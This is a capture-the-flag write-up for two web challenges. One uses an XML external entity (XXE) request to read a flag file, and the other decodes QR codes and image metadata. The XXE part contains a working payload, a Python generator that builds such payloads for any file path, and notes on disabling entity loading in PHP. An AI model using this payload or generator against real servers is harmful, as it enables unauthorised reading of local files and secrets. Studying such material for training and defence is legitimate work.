# Web

## Mr. Hekker (Shuvsec)

The contact form at `/contact.php` accepts raw XML and the server-side parser resolves external entities, so this is a classic XXE. Declaring an entity that points at `file:///home/hekker/flag.txt` and referencing it inside `<message>` makes the server read the file and echo its contents back in the response.

Request

```
POST /contact.php HTTP/1.1
Host: hekker.noobarmy.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 240
Origin: http://hekker.noobarmy.org
Connection: close
Referer: http://hekker.noobarmy.org/
DNT: 1
Sec-GPC: 1

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe0alxq SYSTEM "file:///home/hekker/flag.txt"> ]><contact><name>axe</name><email>email@mail.com</email><subject>subject</subject><message>undefined&xxe0alxq;</message></contact>
```

Response

```
HTTP/1.1 200 OK
Date: Sun, 20 Dec 2020 05:11:42 GMT
Server: Apache/2.4.38 (Debian)
X-Powered-By: PHP/7.2.34
Vary: Accept-Encoding
Content-Length: 73
Connection: close
Content-Type: text/html; charset=UTF-8

Your msg has been receipt as undefinedvulncon{MR_H4kk3r_w1th_XXE_(+_+)}
```

## Maze (j11b0)

Target: http://maze.noobarmy.org/

gobuster finds the `/projects` directory. The page source there contains a commented-out image tag that shows where the images live:

```
<!-- <img src="justsomerandomfoldername/image-0.png"> -->
```

These are QR codes. Let's dump their contents:

```python
import io

import requests
from PIL import Image
from pyzbar.pyzbar import decode

BASE = "http://maze.noobarmy.org/projects/justsomerandomfoldername/image-{0}.png"

# Fetch each QR-code image (image-0 .. image-27) and print the text it encodes
for i in range(28):
    r = requests.get(BASE.format(i))
    image = Image.open(io.BytesIO(r.content))
    decoded = decode(image)
    print("i:" + str(i) + ": " + decoded[0].data.decode("utf-8"))
```

Output:

```
i:0: Hello
i:1: and
i:2: welcome
i:3: to
i:4: this
i:5: challenge!
i:6: We
i:7: hope
i:8: that
i:9: collecting
i:10: these
i:11: images
i:12: was
i:13: not
i:14: that
i:15: hard
i:16: for
i:17: you,
i:18: anyways
i:19: just
i:20: so
i:21: you
i:22: know
i:23: i
i:24: love
i:25: the
i:26: number
i:27: 13
```

Let's take a look at image-13:

![](https://i.imgur.com/txTchqF.png)

```
exiftool image-13.png | grep Creator
Creator : aWh5YXBiYXtqQCRfN3UxJF8zaTNhX0BfajNvX3B1QHl5M2F0Mz99
```

The `Creator` value is base64; decode it and apply ROT13 to get the flag.
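The following is an added example (mine, not the writeup's) that does the last two Maze steps offline: it walks the PNG chunk list to pull out text metadata, verifying each chunk CRC, then base64-decodes and ROT13s the `Creator` value. The exiftool output does not say which chunk holds `Creator` in the real image-13.png (it could equally be XMP `dc:creator`), so the sample PNG built by `make_sample_png()` stores it in a tEXt chunk as an assumption of this example; the `CREATOR` constant is the string from the exiftool output above, and the function names are mine.

```python
import base64
import codecs
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

# Value taken from the exiftool output above
CREATOR = "aWh5YXBiYXtqQCRfN3UxJF8zaTNhX0BfajNvX3B1QHl5M2F0Mz99"


def _chunk(ctype, data):
    """Serialise one PNG chunk: big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_sample_png(text_fields):
    """Constructed 1x1 greyscale PNG carrying one tEXt chunk per key/value.

    Stand-in for image-13.png (assumption: Creator lives in a tEXt chunk).
    """
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, 8-bit grey
    idat = zlib.compress(b"\x00\x00")  # filter type 0 + one grey pixel
    png = PNG_SIG + _chunk(b"IHDR", ihdr)
    for key, value in text_fields.items():
        png += _chunk(b"tEXt", key.encode("latin-1") + b"\x00" + value.encode("latin-1"))
    return png + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def png_text_chunks(data):
    """Walk the chunk list and return {keyword: text} for tEXt and zTXt chunks.

    Every CRC is checked, so a corrupted or truncated chunk raises instead of
    being silently misread.
    """
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos, out = len(PNG_SIG), {}
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 8 + length
        if end + 4 > len(data):
            raise ValueError(f"truncated {ctype!r} chunk")
        body = data[pos + 8:end]
        (crc,) = struct.unpack(">I", data[end:end + 4])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk")
        if ctype == b"tEXt":  # keyword, NUL, latin-1 text
            key, _, text = body.partition(b"\x00")
            out[key.decode("latin-1")] = text.decode("latin-1")
        elif ctype == b"zTXt":  # keyword, NUL, compression method byte, zlib data
            key, _, rest = body.partition(b"\x00")
            out[key.decode("latin-1")] = zlib.decompress(rest[1:]).decode("latin-1")
        pos = end + 4
        if ctype == b"IEND":
            break
    return out


def decode_creator(value):
    """Peel the two layers the writeup identifies: base64, then ROT13."""
    return codecs.decode(base64.b64decode(value).decode("ascii"), "rot_13")


if __name__ == "__main__":
    png = make_sample_png({"Creator": CREATOR, "Software": "constructed sample"})
    print(decode_creator(png_text_chunks(png)["Creator"]))
```

Running it prints `vulncon{w@$_7h1$_3v3n_@_w3b_ch@ll3ng3?}`, the same result you get from the string in the exiftool output by hand.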
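Going back to the Mr. Hekker request, here is an added example (mine, not code from the writeup or the challenge) of what that payload does inside a parser: `build_xxe_payload()` generates the same DOCTYPE/entity trick for any file path, `parse_contact()` uses Python's expat bindings to show the document with external entities resolved (what the PHP backend evidently did) versus refused, and `extract_leak()` pulls the leaked file out of a reflected response. The file system is a constructed in-memory dict seeded with the flag string from the response above, so nothing touches real files; the function names, the `FAKE_FS` dict and the `marker` argument are assumptions of this example.

```python
import xml.parsers.expat as expat

# Constructed stand-in for the target's disk (assumption of this example); the
# flag text is the string the server echoed back in the response above.
FAKE_FS = {
    "/home/hekker/flag.txt": "vulncon{MR_H4kk3r_w1th_XXE_(+_+)}",
}


def build_xxe_payload(path, entity="xxe", marker="undefined"):
    """Contact XML whose <message> expands an external entity pointing at path.

    marker is a fixed string placed before the entity so the leaked data can be
    located in a response that echoes the message back.
    """
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<!DOCTYPE foo [<!ENTITY {entity} SYSTEM "file://{path}"> ]>'
        "<contact><name>axe</name><email>email@mail.com</email>"
        f"<subject>subject</subject><message>{marker}&{entity};</message></contact>"
    )


def parse_contact(xml_text, resolve_external):
    """Parse the contact document into {element name: text content}.

    resolve_external=True behaves like libxml with LIBXML_NOENT: each SYSTEM
    entity is fetched (here from FAKE_FS) and spliced into the document.
    resolve_external=False refuses any external entity and raises ValueError.
    """
    fields, stack, buf = {}, [], {}
    parser = expat.ParserCreate()

    def start_element(name, attrs):
        stack.append(name)
        buf[name] = []

    def end_element(name):
        stack.pop()
        fields[name] = "".join(buf[name])

    def char_data(data):
        if stack:
            buf[stack[-1]].append(data)

    def external_entity_ref(context, base, system_id, public_id):
        # Called for each &name; reference whose entity was declared SYSTEM.
        if not resolve_external or not system_id.startswith("file://"):
            return 0  # expat turns 0 into an ExpatError and stops parsing
        content = FAKE_FS.get(system_id[len("file://"):])
        if content is None:
            return 0
        # The child parser inherits our handlers, so the file content arrives
        # in char_data exactly as if it were literal text inside <message>.
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(content, True)
        return 1

    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = char_data
    parser.ExternalEntityRefHandler = external_entity_ref
    try:
        parser.Parse(xml_text, True)
    except expat.ExpatError as exc:
        raise ValueError(f"external entity not resolved: {exc}") from None
    return fields


def rejects_external_entities(xml_text):
    """True if strict parsing refuses the document (the check a fix should pass)."""
    try:
        parse_contact(xml_text, resolve_external=False)
    except ValueError:
        return True
    return False


def extract_leak(response_body, marker="undefined"):
    """Return the text the server echoed after marker, i.e. the expanded entity."""
    idx = response_body.find(marker)
    if idx < 0:
        return None
    return response_body[idx + len(marker):].strip()


if __name__ == "__main__":
    payload = build_xxe_payload("/home/hekker/flag.txt")
    print(parse_contact(payload, resolve_external=True)["message"])
    # Body of the response captured above
    print(extract_leak("Your msg has been receipt as undefinedvulncon{MR_H4kk3r_w1th_XXE_(+_+)}"))
```

The `undefined` prefix in the original request happens to make the leaked data easy to locate; any fixed marker works. On the defensive side, PHP's libxml only substitutes external entities when `LIBXML_NOENT` is passed to `simplexml_load_string()` or `DOMDocument::loadXML()`; on PHP 7.x (the target reports 7.2.34) calling `libxml_disable_entity_loader(true)` additionally blocks the loader, and PHP 8 disables external entity loading by default.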